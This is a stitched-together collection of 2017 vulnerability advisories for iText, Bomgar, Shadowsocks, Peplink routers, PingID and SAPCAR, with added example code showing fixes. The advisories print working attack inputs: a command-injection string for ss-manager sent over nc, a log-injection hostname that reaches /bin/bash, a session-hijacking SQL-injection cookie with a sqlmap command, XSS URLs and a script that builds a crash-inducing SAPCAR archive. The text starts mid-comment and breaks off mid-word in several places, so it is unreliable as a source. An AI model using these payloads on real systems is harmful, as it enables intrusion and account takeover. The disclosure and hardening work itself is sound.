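 * quotes and double each embedded quote. Sample data is constructed.
 */
#include <stdio.h>
#include <string.h>

/* Write s as one CSV field into out (capacity cap, NUL-terminated).
 * Returns bytes written excluding the NUL, or -1 if out is too small. */
int csv_quote_field(const char *s, char *out, size_t cap)
{
    size_t pos = 0;
    if (strpbrk(s, ",\"\r\n") == NULL) {        /* nothing to escape */
        size_t n = strlen(s);
        if (n + 1 > cap) return -1;
        memcpy(out, s, n + 1);
        return (int)n;
    }
    if (cap < 3) return -1;                     /* "" plus NUL at least */
    out[pos++] = '"';
    for (; *s; s++) {
        size_t need = (*s == '"') ? 2 : 1;      /* embedded quote doubles */
        if (pos + need + 2 > cap) return -1;    /* + closing quote + NUL */
        if (*s == '"') out[pos++] = '"';
        out[pos++] = *s;
    }
    out[pos++] = '"';
    out[pos] = '\0';
    return (int)pos;
}

/* Join quoted fields into one CRLF-terminated record; length or -1. */
int csv_write_record(const char *const *fields, size_t nfields,
                     char *out, size_t cap)
{
    size_t pos = 0;
    for (size_t i = 0; i < nfields; i++) {
        if (i > 0) {
            if (pos + 1 >= cap) return -1;
            out[pos++] = ',';
        }
        int n = csv_quote_field(fields[i], out + pos, cap - pos);
        if (n < 0) return -1;
        pos += (size_t)n;
    }
    if (pos + 3 > cap) return -1;
    out[pos++] = '\r';
    out[pos++] = '\n';
    out[pos] = '\0';
    return (int)pos;
}

/* Quote-aware record counter standing in for the GUI's log viewer: a line
 * break inside a quoted field does not end the record. */
size_t csv_count_records(const char *buf)
{
    size_t records = 0;
    int in_quotes = 0;
    for (const char *p = buf; *p; p++) {
        if (*p == '"') {
            if (in_quotes && p[1] == '"') p++;  /* doubled quote in field */
            else in_quotes = !in_quotes;
        } else if (*p == '\n' && !in_quotes) {
            records++;
        }
    }
    return records;
}

/* Constructed sample: a user name carrying CR/LF and separators, the shape
 * the advisory describes; addresses are RFC 5737 documentation ranges. */
static const char *const SAMPLE_IP     = "192.0.2.10";
static const char *const SAMPLE_USER   = "guest\r\n198.51.100.7,admin,LOGIN_OK";
static const char *const SAMPLE_STATUS = "LOGIN_FAILED";

/* Log the sample by raw concatenation (the vulnerable pattern) or through
 * csv_write_record, and return how many records a quote-aware reader sees:
 * 2 for the raw version (one forged entry), 1 for the quoted one. */
size_t sample_record_count(int quoted, char *out, size_t cap)
{
    if (quoted) {
        const char *fields[] = { SAMPLE_IP, SAMPLE_USER, SAMPLE_STATUS };
        if (csv_write_record(fields, 3, out, cap) < 0) return 0;
    } else {
        int n = snprintf(out, cap, "%s,%s,%s\r\n",
                         SAMPLE_IP, SAMPLE_USER, SAMPLE_STATUS);
        if (n < 0 || (size_t)n >= cap) return 0;
    }
    return csv_count_records(out);
}
```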
CVE-2017-9096 iText XML External Entity Vulnerability
#############################################################
#
# COMPASS SECURITY ADVISORY
# https://www.compass-security.com/en/research/advisories/
#
#############################################################
#
# Product:  iText PDF Library
# Vendor:   iText Group
# CVE ID:   CVE-2017-9096
# CSNC ID:  CSNC-2017-017
# Subject:  XML External Entity Attack (XXE)
# Risk:     Medium
# Effect:   Remotely exploitable
# Author:   Benjamin Bruppacher <benjamin.bruppac...@compass-security.com>
# Date:     2017-11-06
#
#############################################################

Introduction:
-------------
iText is a software developer toolkit that allows users to integrate PDF functionalities within their applications, processes or products.

The XML parsers used inside the library are not configured to disable external entities. This can be used for XML External Entity attacks[1].

Affected versions:
------------------
Vulnerable:
 * 2.0.8
 * 5.5.11
 * 7.0.2

Not vulnerable:
 * 5.5.12
 * 7.0.3

Technical Description
---------------------
The attack can be carried out by submitting a malicious PDF to an iText application that parses XML data. By providing a malicious XXE payload inside the XML data that resides in the PDF, an attacker can, for example, extract files or forge requests on the server.

Timeline:
---------
2017-05-10: Discovery by Benjamin Bruppacher
2017-05-15: Initial vendor notification
2017-08-01: Vendor releases patch
2017-11-06: Disclosure of the advisory

References:
-----------
[1] https://www.owasp.org/index.php/XML_External_Entity_(XXE)_Processing
Bomgar Remote Support - Local Privilege Escalation (CVE-2017-5996)
Virtual Security Research, LLC.
https://www.vsecurity.com/
Security Advisory

=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
Advisory Name: Bomgar Remote Support - Local Privilege Escalation
 Release Date: 2017-10-26
  Application: Bomgar Remote Support
     Versions: 15.2.x before 15.2.3
               16.1.x before 16.1.5
               16.2.x before 16.2.4
     Severity: High/Medium
       Author: Robert Wessen
       Author: Mitch Kucia
Vendor Status: Update Released [2]
CVE Candidate: CVE-2017-5996
    Reference: https://www.vsecurity.com/download/advisories/20171026-1.txt
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=

Product Description
~~~~~~~~~~~~~~~~~~~
From Bomgar's website [1]:
"The fastest, most secure way for experts to access and support the systems that need them."

Vulnerability Overview
~~~~~~~~~~~~~~~~~~~~~~
In mid-January, VSR identified a privilege escalation vulnerability in the Bomgar Remote Support application which can be used to escalate from any unprivileged user to nt authority/system on Microsoft Windows 7 systems. The vulnerability originates from an nt authority/system service being executed from a folder with excessive permissions. The exploit requires a remote support agent to log into the affected system.

Vulnerability Details
~~~~~~~~~~~~~~~~~~~~~
The Bomgar Remote Support agent enables remote support personnel to establish screen sharing, access a command shell, and perform system administration tasks on machines with the agent installed. The agent, by default, creates a service running as the Windows LocalSystem account and creates a folder at C:\ProgramData\bomgar-ssc-0x (where each h is a hex character). The agent is also executed from this folder, so the folder is included in the Windows dynamic library loader search path. The default permissions on the C:\ProgramData folder allow all users, even unprivileged ones, to append and write files. These permissions are inherited by sub-directories unless explicitly overridden.

These permissions are not changed during the installation of the agent, so DLL planting/hijacking is possible. A Trojan horse with the same name as one of the requested but not present libraries can be placed inside the C:\ProgramData\bomgar-ssc-0x folder, since this folder is writeable by all users. When a remote support person attempts to connect to the host, the malicious library will be loaded and code can be executed as nt authority/system.

Versions Affected
~~~~~~~~~~~~~~~~~
The issue was originally discovered in version 16.1.1, although it has likely existed since at least version 14. All testing was performed exclusively on Windows 7; however, the vulnerability is suspected to be present on all supported Windows platforms.

Vendor Response
~~~~~~~~~~~~~~~
The following timeline details Bomgar's response to the reported issue:

2017-02-05  VSR contacted Bomgar via several public email addresses to file a security report.
2017-02-06  Bomgar replied, VSR provided additional details on the vulnerability and Bomgar began internal triage.
2017-02-13  Bomgar confirmed reproduction and indicated a hotfix would be available to select customers on 2017-02-17. A patch for all customers would be available at a later date.
2017-03-28  Bomgar releases patch in Remote Support versions 15.2.3 [2], 16.1.5 [3], and 16.2.4 [4].
2017-10-26  VSR advisory released.

Recommendation
~~~~~~~~~~~~~~
Upgrade all client installs to the latest version of the Bomgar Remote Support software as soon as possible.

Common Vulnerabilities and Exposures (CVE) Information
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
The Common Vulnerabilities and Exposures (CVE) project has assigned the number CVE-2017-5996 to this issue. This is a candidate for inclusion in the CVE list (https://cve.mitre.org), which standardizes names for security problems.

Acknowledgments
~~~~~~~~~~~~~~~
Thanks to the Bomgar development team for a prompt response, confirmation, and patch.

=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
References:
1. https://www.bomgar.com/
2. https://www.bomgar.com/support/changelog/remote-support-15-2-3
3. https://www.bomgar.com/support/changelog/remote-support-16-1-5
4. https://www.bomgar.com/support/changelog/remote-support-1624
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=

This advisory is distributed for educational purposes only with the sincere hope that it will help promote public safety. This advisory comes with absolutely NO WARRANTY; not even the implied warranty of merchantability or fitness for a particular purpose. Neither Virtual Security Research, LLC nor the author accepts any liability for any direct, indirect, or consequential loss or dama
Advisory X41-2017-010: Command Execution in Shadowsocks-libev
X41 D-Sec GmbH Security Advisory: X41-2017-010

Command Execution in Shadowsocks-libev
======================================

Overview
--------
Severity Rating: High
Confirmed Affected Versions: 3.1.0
Confirmed Patched Versions: N/A
Vendor: Shadowsocks
Vendor URL: https://github.com/shadowsocks/shadowsocks-libev
Vector: Local
Credit: X41 D-Sec GmbH, Niklas Abel
Status: Public
CVE: not yet assigned
Advisory-URL: https://www.x41-dsec.de/lab/advisories/x41-2017-010-shadowsocks-libev/

Summary and Impact
------------------
Shadowsocks-libev offers local command execution via the configuration file and/or, additionally, code execution via UDP request on 127.0.0.1. The configuration file on the file system or the JSON configuration received via UDP request is parsed and the arguments are passed to the "add_server" function. The function calls "construct_command_line(manager, server);", which returns a string built from the parsed configuration. The string gets executed at line 486, "if (system(cmd) == -1) {", so if a configuration parameter contains "||evil command&&" within the "method" parameter, the evil command will get executed.

The ss-manager uses UDP port 8830 to receive control commands on 127.0.0.1. By default no authentication is required, although a password can be set with the '-k' parameter.

Product Description
-------------------
Shadowsocks-libev is a lightweight secured SOCKS5 proxy for embedded devices and low-end boxes. The ss-manager is meant to control Shadowsocks servers for multiple users; it spawns new servers if needed. It is a port of Shadowsocks created by @clowwindy, and maintained by @madeye and @linusyang.

Proof of Concept
----------------
As passed configuration requests are executed, the following command will create the file "evil" in /tmp/ on the server:

nc -u 127.0.0.1 8839
add: {"server_port":8003, "password":"test", "method":"||touch /tmp/evil||"}

The code is executed through shadowsocks-libev/src/manager.c.

If the configuration file on the file system is manipulated, the code would get executed as soon as a Shadowsocks instance is started from ss-manager, as long as the malicious part of the configuration has not been overwritten.

Workarounds
-----------
There is no workaround available; do not use ss-manager until a patch is released.

About X41 D-Sec GmbH
--------------------
X41 D-Sec is a provider of application security services. We focus on application code reviews, design review and security testing. X41 D-Sec GmbH was founded in 2015 by Markus Vervier. We support customers in various industries such as finance, software development and public institutions.

Timeline
--------
2017-09-28 Issues found
2017-10-05 Vendor contacted
2017-10-09 Vendor contacted, replied to use GitHub for a full disclosure
2017-10-11 Vendor contacted, asked if the vendor is sure to want a full disclosure
2017-10-12 Vendor contacted, replied to create a public issue on GitHub
2017-10-13 Created public issue on GitHub
2017-10-13 Advisory release
Advisory X41-2017-008: Multiple Vulnerabilities in Shadowsocks
X41 D-Sec GmbH Security Advisory: X41-2017-008

Multiple Vulnerabilities in Shadowsocks
=======================================

Overview
--------
Confirmed Affected Versions: Latest commit 2ab8c6b on Sep 6
Confirmed Patched Versions: N/A
Vendor: Shadowsocks
Vendor URL: https://github.com/shadowsocks/shadowsocks/tree/master
Vector: Network
Credit: X41 D-Sec GmbH, Niklas Abel
Status: Public
Advisory-URL: https://www.x41-dsec.de/lab/advisories/x41-2017-008-shadowsocks/

Summary and Impact
------------------
Several issues have been identified which allow attackers to manipulate log files, execute commands, and brute force Shadowsocks even with the autoban.py brute force detection enabled. The brute force detection of autoban.py does not work with the suggested tail command. The key of captured Shadowsocks traffic can be brute forced.

Product Description
-------------------
Shadowsocks is a fast tunnel proxy that helps you bypass firewalls.

Log file manipulation
=====================
Severity Rating: Medium
Confirmed Affected Versions: Latest commit 2ab8c6b on Sep 6
Confirmed Patched Versions: N/A
Vector: Network
CVE: not yet issued
CWE: 117
CVSS Score: 4.3
CVSS Vector: CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N

Summary and Impact
------------------
Log file manipulation is possible with a manipulated hostname sent to the server by a client, even when Shadowsocks runs as quietly as possible with "-qq". A string like "\nI could be any log entry\n" can be sent as the hostname to Shadowsocks; the server then logs an additional line reading "I could be any log entry".

Workarounds
-----------
There is no workaround available; do not trust the log files until a patch is released.

Command Execution
=================
Severity Rating: Critical
Confirmed Affected Versions: Latest commit 2ab8c6b on Sep 6
Confirmed Patched Versions: N/A
Vector: Network
CVE: not yet issued
CWE: 78
CVSS Score: 9.0
CVSS Vector: CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:C/C:H/I:H/A:H

Summary and Impact
------------------
When the brute force detection with autoban.py is enabled, remote attackers are able to execute arbitrary commands.
Command execution is possible because of line 53, "os.system(cmd)", in autoban.py, which executes "cmd = 'iptables -A INPUT -s %s -j DROP' % ip". The "ip" parameter is parsed from the log file, whose contents can be controlled by a third party sending unauthenticated packets.

Proof of Concept
----------------
When a string like "can not parse header when ||ls&:\n" is sent as the hostname to Shadowsocks, it ends up in the log file and leads to the execution of "ls". autoban.py does not execute commands with spaces due to internal sanitization. A requested hostname like:

  " can not parse header when ||ls&:\ntouch /etc/evil.txt\nexit\ncan not parse header when ||/bin/bash

https://github.com/shadowsocks/shadowsocks/wiki/Ban-Brute-Force-Crackers.

The command "python autoban.py < /var/log/shadowsocks.log" does work, but the suggested "nohup tail -F /var/log/shadowsocks.log | python autoban.py > log 2>log &" does not block IPs. The "for line in sys.stdin:" loop in autoban.py reads its input until end of file (EOF). As "tail -F" never delivers an EOF to the python script, sys.stdin blocks the script forever. So "tail -F /var/log/shadowsocks | autoban.py" never blocks anything except itself.

Workarounds
-----------
Run "python autoban.py < /var/log/shadowsocks.log" from a cronjob. Do not use autoban.py until the command execution issue is fixed.

Bruteforcable Shadowsocks traffic because of MD5
================================================
Confirmed Affected Versions: Latest commit 2ab8c6b on Sep 6
Confirmed Patched Versions: N/A

Summary and Impact
------------------
Shadowsocks uses no brute force prevention for its key derivation function. The key for Shadowsocks traffic encryption is static and derived from the password using MD5.
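Added example for the autoban.py findings above (the log-driven command execution and the tail -F pipe that never triggers), written for this page and not the Shadowsocks project's code. It consumes stdin with readline so lines from a "tail -F" pipe are handled as they arrive, takes the address from a "can not parse header when" line only if the ipaddress module accepts it as a literal IPv4/IPv6 address, and passes the iptables command as an argv list instead of through os.system. The log line layout, the ban threshold and the 203.0.113.0/24 sample addresses are constructed; the real Shadowsocks log format and the real autoban.py parsing may differ.

```python
import io
import ipaddress
import re
import subprocess
import sys

# Constructed: the marker text the advisory mentions, with "<ip>:<port>" assumed
# to end the line.  Not a quote of the real shadowsocks log layout.
MARKER = "can not parse header when"
TAIL_RE = re.compile(r"(\S+):(\d+)\s*$")


def extract_ip(line):
    """Return a validated IP string from a failed-header log line, or None.
    Anything that is not a literal IPv4/IPv6 address is rejected, so injected
    text such as '||ls&' can never reach the firewall command."""
    if MARKER not in line:
        return None
    m = TAIL_RE.search(line)
    if not m:
        return None
    try:
        return str(ipaddress.ip_address(m.group(1)))
    except ValueError:
        return None


def ban_command(ip):
    """argv form of the advisory's iptables command; no shell parses it."""
    return ["iptables", "-A", "INPUT", "-s", ip, "-j", "DROP"]


def process(stream, threshold=5, run=subprocess.check_call):
    """Count failures per source address and ban after `threshold` hits
    (constructed value).  iter(readline, '') yields each line as soon as it is
    written, whereas 'for line in stream' on Python 2 fills a read-ahead buffer
    first, which is why the tail -F pipeline in the advisory never acts."""
    counts, banned = {}, []
    for line in iter(stream.readline, ""):
        ip = extract_ip(line)
        if ip is None or ip in banned:
            continue
        counts[ip] = counts.get(ip, 0) + 1
        if counts[ip] >= threshold:
            run(ban_command(ip))
            banned.append(ip)
    return banned


def process_text(text, **kwargs):
    """Convenience wrapper that feeds an in-memory log to process()."""
    return process(io.StringIO(text), **kwargs)


if __name__ == "__main__":
    process(sys.stdin)
```

The `run` parameter exists so the firewall call can be replaced in tests or by a dry-run logger; in production it stays subprocess.check_call, which raises if iptables fails instead of silently continuing.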
The password derivation is in encrypt.py, lines 56 to 63:

  while len(b''.join(m)) < (key_len + iv_len):
      md5 = hashlib.md5()
      data = password
      if i > 0:
          data = m[i - 1] + password
      md5.update(data)
      m.append(md5.digest())
      i += 1

MD5 should not be used to generate keys, since it is a plain hash function. A proper key derivation function increases the cost of this operation, which is a small burden for a legitimate user but a large one for an attacker, who has to perform the operation many more times. As passwords usually have low entropy, a good password derivation function has to be slow.

Workarounds
-----------
Use a secure password generated by a cryptographically secure random generator. Wait for a patch that uses a password based key derivation function like "Argon2" instead of a plain hash.

About X41 D-S
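Added example, not from the Shadowsocks code base: the EVP_BytesToKey-style MD5 chain quoted above written out as a function, beside a derivation using PBKDF2-HMAC-SHA256 from the Python standard library with a random per-session salt and a high iteration count, plus a rough timing of how much more each password guess costs. The iteration count and minimum salt length are constructed choices; Argon2, which the advisory recommends, needs a third-party package and is not used here.

```python
import hashlib
import os
import time


def md5_key_iv(password, key_len, iv_len):
    """The derivation the advisory quotes from encrypt.py: an unsalted MD5 chain,
    one hash per 16 bytes of output.  The same password always yields the same
    key, and one guess costs an attacker only a few MD5 calls."""
    m, i = [], 0
    while len(b"".join(m)) < key_len + iv_len:
        data = password if i == 0 else m[i - 1] + password
        m.append(hashlib.md5(data).digest())
        i += 1
    ms = b"".join(m)
    return ms[:key_len], ms[key_len:key_len + iv_len]


PBKDF2_ITERATIONS = 200_000   # constructed; tune to the hardware's budget
MIN_SALT_LEN = 16             # constructed minimum


def pbkdf2_key(password, salt, key_len, iterations=PBKDF2_ITERATIONS):
    """Slow, salted derivation.  The salt must be fresh random bytes sent along
    with the ciphertext; the iteration count sets the per-guess cost."""
    if len(salt) < MIN_SALT_LEN:
        raise ValueError("salt too short")
    return hashlib.pbkdf2_hmac("sha256", password, salt, iterations, dklen=key_len)


def guess_cost_ratio(password=b"test", key_len=32, iv_len=16, samples=5):
    """Return how many times longer one PBKDF2 derivation takes than one MD5
    chain on this machine.  Machine dependent, but always far above 1."""
    salt = os.urandom(MIN_SALT_LEN)
    t0 = time.perf_counter()
    for _ in range(samples):
        md5_key_iv(password, key_len, iv_len)
    t1 = time.perf_counter()
    for _ in range(samples):
        pbkdf2_key(password, salt, key_len)
    t2 = time.perf_counter()
    return (t2 - t1) / max(t1 - t0, 1e-9)
```

The salt is what stops a single precomputed table from covering every server that shares a password, and the iteration count is what turns a low-entropy password into an expensive brute force; the MD5 chain has neither property.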
X41-2017-005 - Multiple Vulnerabilities in peplink balance routers
X41 D-Sec GmbH Security Advisory: X41-2017-005

Multiple Vulnerabilities in peplink balance routers
===================================================

Overview
--------
Confirmed Affected Versions: 7.0.0-build1904
Confirmed Patched Versions: fw-b305hw2_380hw6_580hw2_710hw3_1350hw2_2500-7.0.1-build2093.bin
Vulnerable Firmware: fw-b305hw2_380hw6_580hw2_710hw3_1350hw2_2500-7.0.0-build1904.bin
Models: Balance Routers 305, 380, 580, 710, 1350, 2500
Vendor: Peplink
Vendor URL: https://www.peplink.com/
Vector: Network
Credit: X41 D-Sec GmbH, Eric Sesterhenn
Additional Credits: Claus Overbeck (Abovo IT)
Status: Public
Advisory-URL: https://www.x41-dsec.de/lab/advisories/x41-2017-005-peplink/

Summary and Impact
------------------
Several issues have been identified which allow attackers to access the administrative web interface with admin credentials, delete files, and perform CSRF and XSS attacks.

Product Description
-------------------
From the vendor webpage: Use Load Balancing and SpeedFusion bandwidth bonding to deliver superfast VoIP, video streaming, and data using an SD-WAN enabled network. Even with a basic Balance 20 dual-WAN router, you can mix different transport technologies and providers to keep your network up when individual links go down. Switching between links is automatic and seamless.

SQL Injection via bauth Cookie
==============================
Severity Rating: Critical
Vector: Network
CVE: CVE-2017-8835
CWE: 89
CVSS Score: 9.8
CVSS Vector: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

Summary and Impact
------------------
Peplink devices are vulnerable to an SQL injection attack via the bauth cookie parameter, which is set e.g. when accessing https://ip/cgi-bin/MANGA/admin.cgi.
The injection can be checked with the following command:

  ./sqlmap.py -u "https://ip/cgi-bin/MANGA/admin.cgi" --cookie="bauth=csOWLxU4BvoMfhY2rHLVFm1EmZWV74zinla9IVclqrYxH16426647" -p "bauth" --level 5 --risk 3 --dbms sqlite --technique=BEUSQ --flush-session -t trace.log --prefix "'" --suffix "--" -a

The vulnerability in the Peplink device allows access to the SQLite session database containing user and session variables. By using the following cookie in a web request, it is possible to select a running administrator session to be used for the attacker's login:

  bauth=-12' or id IN (select s.id from sessions as s left join sessionsvariables as v on v.id=s.id where v.name='rwa' and v.value='1') or '1'='2

By forming specialised SQL queries, it is possible to retrieve usernames from the database. This worked by returning a valid session if the username existed and no session if it did not. In the first case the server did not set a new session cookie in the response to the request.

  SELECT id FROM sessions WHERE sessionid = '-14' or id IN (select s.id from sessions as s left join sessionsvariables as v on v.id=s.id where v.name='username' and substr(v.value,1,3)='adm')

Workarounds
-----------
Install vendor supplied update.

No CSRF Protection
==================
Severity Rating: Medium
Vector: Network
CVE: CVE-2017-8836
CWE: 352
CVSS Score: 5.4
CVSS Vector: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:L/A:N

Summary and Impact
------------------
The CGI scripts in the administrative interface are not protected against cross site request forgery attacks. This allows an attacker to execute commands if a logged in user visits a malicious website. This can, for example, be used to change the credentials of the administrative web interface.

Workarounds
-----------
Install vendor supplied update.
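Added example for the bauth cookie finding above, not Peplink's code: a session lookup against a toy SQLite schema modelled on the table names visible in the queries (sessions, sessionsvariables), showing the string-built query the finding implies beside a parameterized one. Fed the cookie value quoted above, the string-built lookup returns the administrator session; the parameterized lookup binds the whole cookie value as one literal and returns nothing. The column layout and sample rows are constructed.

```python
import sqlite3


def make_db():
    """Constructed schema and data: one administrator session (rwa=1) whose
    session id is the cookie value from the sqlmap command above."""
    db = sqlite3.connect(":memory:")
    db.executescript("""
        CREATE TABLE sessions (id INTEGER PRIMARY KEY, sessionid TEXT);
        CREATE TABLE sessionsvariables (id INTEGER, name TEXT, value TEXT);
        INSERT INTO sessions VALUES
            (1, 'csOWLxU4BvoMfhY2rHLVFm1EmZWV74zinla9IVclqrYxH16426647');
        INSERT INTO sessionsvariables VALUES (1, 'rwa', '1');
        INSERT INTO sessionsvariables VALUES (1, 'username', 'admin');
    """)
    return db


def lookup_concat(db, bauth):
    """Weak pattern: the cookie value is spliced into the SQL text, so a quote
    inside it closes the literal and the rest is executed as SQL."""
    sql = "SELECT id FROM sessions WHERE sessionid = '%s'" % bauth
    return [row[0] for row in db.execute(sql)]


def lookup_param(db, bauth):
    """Hardened: a bound parameter.  The value never enters the SQL text, so no
    part of it can be parsed as a clause."""
    return [row[0] for row in db.execute(
        "SELECT id FROM sessions WHERE sessionid = ?", (bauth,))]
```

Parameterization fixes the mechanism rather than the payload, which is why it also closes the username-enumeration variant in the advisory: the substr() clause can no longer be smuggled into the WHERE condition either.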
Passwords stored in Cleartext
=============================
Severity Rating: Medium
Vector: Network
CVE: CVE-2017-8837
CWE: 256
CVSS Score: 4.0
CVSS Vector: CVSS:3.0/AV:L/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N

Summary and Impact
------------------
The Peplink devices store passwords in cleartext in the files /etc/waipass and /etc/roapass. If one of these devices is compromised, the attacker can obtain the cleartext passwords and abuse them to compromise further systems.

Workarounds
-----------
Install vendor supplied update.

XSS via syncid Parameter
========================
Severity Rating: Medium
Vector: Network
CVE: CVE-2017-8838
CWE: 80
CVSS Score: 5.4
CVSS Vector: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:L/A:N

Summary and Impact
------------------
If the web interface is accessible, it is possible to abuse the syncid parameter to trigger a cross-site scripting issue by calling

  https://ip/cgi-bin/HASync/hasync.cgi?debug=1=123%3Cscript%3Ealert%281%29%3C/script%3E

This executes the JavaScript in the victim's browser, which can be abused to steal session cookies.

Workarounds
-----------
Install vendor supplied update.

XSS via preview.cgi
===================
Severity Rating: Medium
Vector: Network
CVE: CVE-2017-8839
CWE: 80
CVSS Score: 5.4
CVSS Vector: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:L/A:N

Summary and Impact
------------------
If the webint
PingID (MFA) - Reflected Cross-Site Scripting
#############################################################
#
# COMPASS SECURITY ADVISORY
# https://www.compass-security.com/research/advisories/
#
#############################################################
#
# Product:  PingID (MFA) [1]
# Vendor:   Ping Identity Corporation
# CSNC ID:  CSNC-2017-013
# Subject:  Reflected Cross-Site Scripting
# Risk:     High
# Effect:   Remotely exploitable
# Author:   Stephan Sekula <stephan.sek...@compass-security.com>
# Date:     18.04.2017
#
#############################################################

Introduction:
-------------
With PingID MFA, you can easily control when your users need to authenticate with a second factor. You can configure your policies based upon the following:

Group - Require MFA for members of a specific group.
Application - Require MFA for specific applications.
Geofence - Require MFA if the user is outside a pre-set geofence.
Rooted or Jailbroken device - Require MFA if the user's device is rooted or jailbroken.
Network IP - Require MFA if the device isn't in a specific IP range.

PingID MFA delivers the granular security that your policies require with the ease of use your users want. [1]

Compass Security discovered a web application security flaw in PingID's authentication process which allows an attacker to manipulate the resulting website. This allows, for instance, attacking the user's browser or redirecting the user to a phishing website.

Technical Description:
----------------------
During the authentication process, a message parameter is used which can be manipulated. If this parameter contains JavaScript code, it is executed in the user's browser. Exploiting the vulnerability leads to so-called Cross-Site Scripting (XSS), allowing the execution of JavaScript in the context of the victim.
Request:

  POST /pingid/ppm/auth/otp HTTP/1.1
  Host: authenticator.pingone.com
  [CUT]
  Referer: https://authenticator.pingone.com/pingid/ppm/auth/otp
  Connection: close
  Content-Type: application/x-www-form-urlencoded
  Content-Length: 44

  otp=123456=alert(0)

Response:

  HTTP/1.1 200 OK
  Date: Thu, 13 Apr 2017 11:21:45 GMT
  Server:
  Cache-Control: no-cache, no-store
  [CUT]
  Connection: close
  X-Content-Type-Options: nosniff
  Content-Length: 8313
  [CUT]

  [CUT] alert(0) [CUT]

Workaround / Fix:
-----------------
The vendor has addressed the vulnerability. In general, this issue can be fixed by properly encoding all output that is sent back to the user, for instance using HTML encoding to convert < to &lt; and > to &gt;.

Timeline:
---------
2017-05-16: Coordinated public disclosure date
2017-05-03: Release of fixed version/patch
2017-04-20: Initial vendor response
2017-04-19: Initial vendor notification
2017-04-13: Discovery by Stephan Sekula

References:
-----------
[1] https://www.pingidentity.com/en/products/pingid.html
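Added example (not Ping Identity code) of the fix the advisory describes: rendering a user-controlled message parameter into an HTML page with output encoding, beside the unencoded rendering that reproduces the problem. It uses html.escape from the Python standard library, which also encodes quotes, so the same call is safe inside attribute values. The page template, the field names beyond "otp", and the request body values are constructed.

```python
import html
from urllib.parse import parse_qs

# Constructed page fragment standing in for the authentication form.
TEMPLATE = '<p class="msg">{message}</p>\n<input name="otp" value="{otp}">'


def render_unencoded(params):
    """Reproduces the defect: parameter values are written straight into the
    HTML, so any markup they carry becomes part of the document."""
    return TEMPLATE.format(message=params.get("message", ""),
                           otp=params.get("otp", ""))


def render_encoded(params):
    """Hardened: every dynamic value passes through html.escape(quote=True),
    which maps < > & " ' to entities; the browser shows them as text."""
    return TEMPLATE.format(
        message=html.escape(params.get("message", ""), quote=True),
        otp=html.escape(params.get("otp", ""), quote=True))


def handle_post(body):
    """Parse an application/x-www-form-urlencoded body like the request above
    (first value per field) and return the encoded page."""
    fields = {k: v[0] for k, v in parse_qs(body, keep_blank_values=True).items()}
    return render_encoded(fields)


def contains_raw_markup(page, payload):
    """Review helper: True if the payload survived into the page unencoded."""
    return payload in page
```

Encoding at the output point, in the HTML context where the value lands, is what makes this robust: it does not depend on guessing every string an input filter would have to block.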
[CORE-2017-0001] - SAP SAPCAR Heap Based Buffer Overflow Vulnerability
1. *Advisory Information*

Title: SAP SAPCAR Heap Based Buffer Overflow Vulnerability
Advisory ID: CORE-2017-0001
Advisory URL: http://www.coresecurity.com/advisories/sap-sapcar-heap-based-buffer-overflow-vulnerability
Date published: 2017-05-10
Date of last update: 2017-05-10
Vendors contacted: SAP
Release mode: Coordinated release

2. *Vulnerability Information*

Class: Heap-based Buffer Overflow [CWE-122]
Impact: Code execution
Remotely Exploitable: No
Locally Exploitable: Yes
CVE Name: CVE-2017-8852

3. *Vulnerability Description*

SAP [1] distributes software and packages using an archive program called SAPCAR [2]. This program uses a custom archive file format. A memory corruption vulnerability was found in the parsing of specially crafted archive files that could lead to local code execution scenarios.

4. *Vulnerable Packages*

. SAPCAR archive tool version 721.510

Other products and versions might be affected, but they were not tested.

5. *Vendor Information, Solutions and Workarounds*

SAP published the following Security Notes:

. 2441560

6. *Credits*

This vulnerability was discovered and researched by Martin Gallo and Maximiliano Vidal from Core Security Consulting Services. The publication of this advisory was coordinated by Alberto Solino from Core Advisories Team.

7. *Technical Description / Proof of Concept Code*

This vulnerability is caused by a controlled heap buffer overflow when opening a specially crafted CAR archive file.
The following python code can be used to generate an archive file that triggers the vulnerability:

/-----
#!/usr/bin/env python
from scapy.packet import Raw
from pysap.SAPCAR import *

# We write a file just to have some data to put into the archive
with open("string.txt", "w") as fd:
    fd.write("Some string to compress")

# Create a new SAP CAR Archive
f = SAPCARArchive("poc.car", mode="wb", version=SAPCAR_VERSION_200)

# Add the text file
f.add_file("string.txt")

# Replace the blocks in the compressed file with the faulty blocks
f._sapcar.files0[0].blocks.append(Raw("D>" + "\x00"*30 + "\x00\xff"))
f._sapcar.files0[0].blocks.append(Raw("A" * 0x))

# Write the file
f.write()
-----/

$ ./SAPCAR -tvf poc.car
SAPCAR: processing archive poc.car (version 2.00)
-rw-rw-r--          23    09 Feb 2017 18:12 string.txt
Segmentation fault (core dumped)

A CAR archive file in its version 2.00 is comprised of an archive header and a list of archived files [3]. Each archived file has a header containing the file's metadata, and the content of the file is split among several blocks. When the SAPCAR program opens a file containing an archived file block of a type different from the known ones [4], it reads an additional 32 bytes of file metadata. The program then uses the last two bytes of the data read as a size field and copies that amount of data into a fixed-length buffer previously allocated on the heap. As the length field is not validated, the operation results in a heap-based buffer overflow.

It is worth mentioning that signature validation does not prevent the vulnerability from being triggered, as the signature file needs to be extracted from the archive before the validation can be performed.

8. *Report Timeline*

2017-02-15: Core Security sent an initial notification to SAP.
2017-02-16: SAP confirmed the reception of the email and requested the draft version of the advisory.
